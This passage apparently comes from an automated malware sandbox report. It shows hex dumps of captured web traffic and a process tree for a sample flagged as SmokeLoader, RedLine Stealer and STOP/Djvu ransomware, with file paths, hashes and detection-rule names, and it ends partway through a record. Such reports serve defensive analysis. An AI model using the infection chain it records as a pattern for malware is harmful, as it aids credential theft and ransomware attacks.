67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72
                                                                                                                                  Data Ascii: /v3/yi/l/0,cross/uaRUZk18yNI.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yk/l/0,cross/g3dvi-vdwE6.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="pr
                                                                                                                                  2022-10-17 20:07:20 UTC1158INData Raw: 22 5a 38 7a 36 59 6f 30 22 2c 22 63 68 58 77 50 72 55 22 2c 22 41 39 63 69 56 42 39 22 2c 22 58 39 6e 72 36 35 61 22 2c 22 50 4d 45 73 2f 6f 79 22 2c 22 65 4d 6b 4d 78 48 5a 22 2c 22 39 79 6f 4e 79 58 58 22 2c 22 51 4d 54 46 61 33 6c 22 2c 22 59 76 33 35 4f 66 32 22 2c 22 55 66 71 36 59 57 58 22 2c 22 52 35 77 31 72 43 4a 22 2c 22 6f 2f 75 6e 79 72 6e 22 2c 22 50 30 67 55 4c 47 6f 22 2c 22 43 47 6b 48 34 46 59 22 2c 22 65 39 41 4e 7a 77 2f 22 2c 22 6f 77 65 73 41 33 50 22 2c 22 52 4d 34 4d 52 34 6e 22 2c 22 41 70 47 35 56 4b 34 22 5d 7d 29 3b 7d 29 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70
                                                                                                                                  Data Ascii: "Z8z6Yo0","chXwPrU","A9ciVB9","X9nr65a","PMEs/oy","eMkMxHZ","9yoNyXX","QMTFa3l","Yv35Of2","Ufq6YWX","R5w1rCJ","o/unyrn","P0gULGo","CGkH4FY","e9ANzw/","owesA3P","RM4MR4n","ApG5VK4"]});}));</script><script>requireLazy(["__bigPipe"],function(bigPipe){bigPip
                                                                                                                                  2022-10-17 20:07:20 UTC1159INData Raw: 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 61 6e 7a 61 69 42 61 73 65 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 34 35 38 31 31 33 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 69 41 72 52 4e 75 30 4a 4f 58 35 6f 71 66 31 32 33 68 46 58 7a 31 6b 6d 59 71 4f 6b 30 44 54 35 41 6c 49 56 6e 77 55 56 36 67 64 31 42 30 65 6d 6a 39 4e 61 34 32 64 4a 70 58 2d 79 35 5a 68 39 58 73 33 57 68 6e 62 51 57 36 50 36 44 6c 6d 67 69 6a 31 4c 78 68 36 63 4a 7a 76 41 22 5d 7d 2c 2d 31 5d
                                                                                                                                  Data Ascii: "],{__rc:["BanzaiBase","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["cr:1458113",[],{__rc:[null,"Aa3iArRNu0JOX5oqf123hFXz1kmYqOk0DT5AlIVnwUV6gd1B0emj9Na42dJpX-y5Zh9Xs3WhnbQW6P6Dlmgij1Lxh6cJzvA"]},-1]
                                                                                                                                  2022-10-17 20:07:20 UTC1161INData Raw: 4c 5f 30 55 32 74 44 34 6f 45 73 4d 5f 42 5a 35 7a 49 33 34 64 7a 6f 4d 65 72 66 6d 70 78 62 2d 73 6f 5a 71 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 37 31 34 37 33 22 2c 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 30 35 31 35 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 39 45 35 55 48 50 32
                                                                                                                                  Data Ascii: L_0U2tD4oEsM_BZ5zI34dzoMerfmpxb-soZqA"]},-1],["cr:971473",["LayerHideOnTransition"],{__rc:["LayerHideOnTransition","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["cr:1105154",[],{__rc:[null,"Aa39E5UHP2
                                                                                                                                  2022-10-17 20:07:20 UTC1162INData Raw: 33 22 2c 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 77 61 72 6e 69 6e 67 42 6c 75 65 22 2c 22 41 61 30 6b 69 52 42 53 46 39 6f 35 4d 35 6e 4d 76 64 71 6e 62 37 6f 6e 57 6b 55 48 4b 4a 67 64 4b 45 57 55 70 58 45 32 4a 30 57 46 50 71 5f 61 4f 61 44 72 45 64 78 6d 62 7a 4e 47 39 6b 65 71 55 49 46 6d 46 67 6c 74 56 7a 4d 70 42 61 76 6f 61 30 47 39 75 2d 6e 5f 41 4c 76 57 22 5d 7d 2c 2d 31 5d 2c 5b 22 43 6f 72 65 57 61 72 6e 69 6e 67 47 4b 22 2c 5b 5d 2c 7b 66 6f 72 63 65 57 61 72 6e 69 6e 67 3a 66 61 6c 73 65 7d 2c 37 32 35 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 36 22 2c 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f 64 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 2e 63 6c 61 73 73 69 63 2e 70 72 6f
                                                                                                                                  Data Ascii: 3",["warningBlue"],{__rc:["warningBlue","Aa0kiRBSF9o5M5nMvdqnb7onWkUHKJgdKEWUpXE2J0WFPq_aOaDrEdxmbzNG9keqUIFmFgltVzMpBavoa0G9u-n_ALvW"]},-1],["CoreWarningGK",[],{forceWarning:false},725],["cr:1344486",["ReactDOM.classic.prod"],{__rc:["ReactDOM.classic.pro
                                                                                                                                  2022-10-17 20:07:20 UTC1162INData Raw: 31 30 61 30 0d 0a 50 53 39 4a 38 4c 4a 71 52 38 54 67 2d 63 4f 71 48 72 69 32 70 6b 67 74 70 6f 68 67 6d 77 44 54 72 39 70 54 5a 41 2d 61 6b 54 6c 59 37 7a 6a 79 47 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 39 45 35 55 48 50 32 66 63 36 74 73 4d 6b 49 7a 75 61 6c 65 61 51 57 76 75 78 65 30 41 76 5a 76 72 4b 79 52 67 67 4b 45 55 75 4c 5f 30 55 32 74 44 34 6f 45 73 4d 5f 42 5a 35 7a 49 33 34 64 7a 6f 4d 65 72 66 6d 70 78 62 2d 73 6f 5a 71 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f
                                                                                                                                  Data Ascii: 10a0PS9J8LJqR8Tg-cOqHri2pkgtpohgmwDTr9pTZA-akTlY7zjyGA"]},-1],["cr:983844",[],{__rc:[null,"Aa39E5UHP2fc6tsMkIzualeaQWvuxe0AvZvrKyRggKEUuL_0U2tD4oEsM_BZ5zI34dzoMerfmpxb-soZqA"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMForked-pro
                                                                                                                                  2022-10-17 20:07:20 UTC1164INData Raw: 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 52 72 53 4b 57 75 50 35 63 73 67 69 2d 51 43 74 37 37 72 53 36 64 6e 73 30 6b 47 74 66 30 6b 49 36 7a 70 65 71 6c 38 34 78 72 68 49 47 31 4e 56 36 71 79 68 47 4d 6c 54 70 76 33 4e 51 76 58 66 44 62 72 43 55 75 4a 56 47 53 54 77 44 5a 56 52 54 6b 68 35 44 44 31 41 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22 42 44 43 6c 69 65
                                                                                                                                  Data Ascii: VRTkh5DD1A"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2RrSKWuP5csgi-QCt77rS6dns0kGtf0kI6zpeql84xrhIG1NV6qyhGMlTpv3NQvXfDbrCUuJVGSTwDZVRTkh5DD1A"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["BDClie
                                                                                                                                  2022-10-17 20:07:20 UTC1165INData Raw: 69 6d 65 53 70 65 6e 74 42 69 74 41 72 72 61 79 4c 6f 67 67 65 72 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 2d 4c 56 4e 59 7a 39 36 56 38 63 4c 7a 35 70 69 30 37 6d 5f 30 65 6f 63 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 2d 4c 56 4e 59 39 59 6a 56 4f 38 49 73 30 6d 74 30 6e 48 4f 6d 34 68 6f 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 5d 7d 2c 68 73
                                                                                                                                  Data Ascii: imeSpentBitArrayLogger","init",[],[]],["DeferredCookie","addToQueue",[],["_js_datr","-LVNYz96V8cLz5pi07m_0eoc",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","-LVNY9YjVO8Is0mt0nHOm4ho",63072000000,"/",false,false,true]]]},hs


                                                                                                                                  Click to jump to process

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:22:05:16
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:222208 bytes
                                                                                                                                  MD5 hash:644232606A176287A73169B177EB8752
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.425983176.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:1
                                                                                                                                  Start time:22:05:23
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                  Imagebase:0x7ff69bc80000
                                                                                                                                  File size:3933184 bytes
                                                                                                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:high

                                                                                                                                  Target ID:4
                                                                                                                                  Start time:22:06:28
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:753664 bytes
                                                                                                                                  MD5 hash:36FC2440660C5F4509C3ABCDDE9A1C3A
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.533353582.0000000000926000.00000040.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000004.00000002.535198991.0000000002260000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:22:06:29
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\thduhcf
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Roaming\thduhcf
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:222208 bytes
                                                                                                                                  MD5 hash:644232606A176287A73169B177EB8752
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.572802544.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.575526582.0000000000851000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:6
                                                                                                                                  Start time:22:06:30
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\69A9.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\69A9.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:221696 bytes
                                                                                                                                  MD5 hash:BD0DFD6CBAE2B012D4A5F155D10ED054
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.505319031.0000000000841000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.503555817.00000000006D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:7
                                                                                                                                  Start time:22:06:35
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\7795.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\7795.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:223744 bytes
                                                                                                                                  MD5 hash:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000000.492089857.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000002.531881974.0000000000921000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000002.531437946.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000000.494940938.0000000000921000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000007.00000000.499882815.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000007.00000000.500354218.0000000000921000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:8
                                                                                                                                  Start time:22:06:36
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\6246.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:753664 bytes
                                                                                                                                  MD5 hash:36FC2440660C5F4509C3ABCDDE9A1C3A
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.496174295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.525988864.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.501708099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000002.536320589.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.524094887.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.506719194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                  • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                  • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000008.00000000.520562150.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:9
                                                                                                                                  Start time:22:06:37
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\837D.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\837D.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:223744 bytes
                                                                                                                                  MD5 hash:D878530A6E5C388668853A620D1B6E05
                                                                                                                                  Has elevated privileges:false
                                                                                                                                  Has administrator privileges:false
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000000.491916459.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000000.499526693.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.533230788.0000000000661000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.532778418.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000000.500012370.0000000000661000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000000.493912114.0000000000661000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  Reputation:low

                                                                                                                                  Target ID:10
                                                                                                                                  Start time:22:06:39
                                                                                                                                  Start date:17/10/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\8C19.exe
                                                                                                                                  Wow64 process (32bit):false
